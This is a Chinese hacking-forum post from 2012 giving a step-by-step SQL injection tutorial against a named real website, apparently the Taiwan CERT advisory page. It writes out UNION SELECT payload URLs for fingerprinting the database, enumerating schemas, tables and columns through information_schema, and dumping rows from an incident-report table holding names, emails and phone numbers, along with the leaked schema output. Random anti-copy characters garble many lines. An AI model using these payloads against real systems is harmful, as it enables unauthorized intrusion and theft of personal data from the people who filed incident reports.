找回密码
 立即注册
查看: 2390|回复: 0
打印 上一主题 下一主题

.高级暴库方法讲解

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:57:04 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询; Z# z; z# I( G# g% |/ x
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
* {; p+ P, O& U# y2 v/ P6 khttp://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
  i  J. C( A$ i, q3 y2 Q3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--' O! n! Z4 q. {
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
7 E9 [* L. _! v4.判断有没有写权限
  R2 g  Q2 }0 L( Yhttp://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
) D1 i$ ^" G7 r: j; R4 ?没办法,手动猜表啦5 A5 U  q" Y; X' A
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
% Z$ l) @8 ]4 e2 {% n% R但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
8 l+ r$ _: s! P* w' o1 E' n; Vhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--( b7 c; }. \# P" U  U; Z) n$ L5 R
成功查出所有数据库,国外的黑客就是不一般。数据库如下:
) o. S" J8 l% B& w$ `7 A  i  Xinformation_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
8 C5 N7 |0 }/ D8 m9 Y3 Y5 ?( d/ D6.爆表,爆的是twcert库. @4 g# }! r9 F( e: R) [
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--" f/ F% b: k( H3 }# g9 {) B
爆出如下表5 `, e  {* w) ^' z' K( R% i- m
downloadfile,irsys,newsdata,secrpt,secrpt_big5
, W5 q( d+ n$ I! t7 ?) v6 _7.爆列名,这次爆的是irsys表
; _7 Z' N- v  w6 F- }9 J* t' Ehttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--9 y- [3 @4 y% I# Y0 f
爆出如下列" }/ N% y% o# c" k3 g
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
# v% }8 M2 Y3 }  b8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
+ K3 W: S7 O% c! R0 a5 T. ?. nhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
2 m  c- o8 n6 l( o3 Q( |) D返回是3,说明每个列里有3个地段
! M5 C: W! @8 J% R4 F% F9.爆字段内容
1 `7 j# D+ p9 o: R4 Ghttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--4 ^9 N& Y$ I1 |9 K* ~0 A+ w* K. T
爆出name列的第一个字段的内容
7 V& C9 h" X0 K+ r  J' D& n6 N: Ahttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
, \4 k- X/ R9 \* |4 B* m" |4 ]爆出name列的第二个字段的内容
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表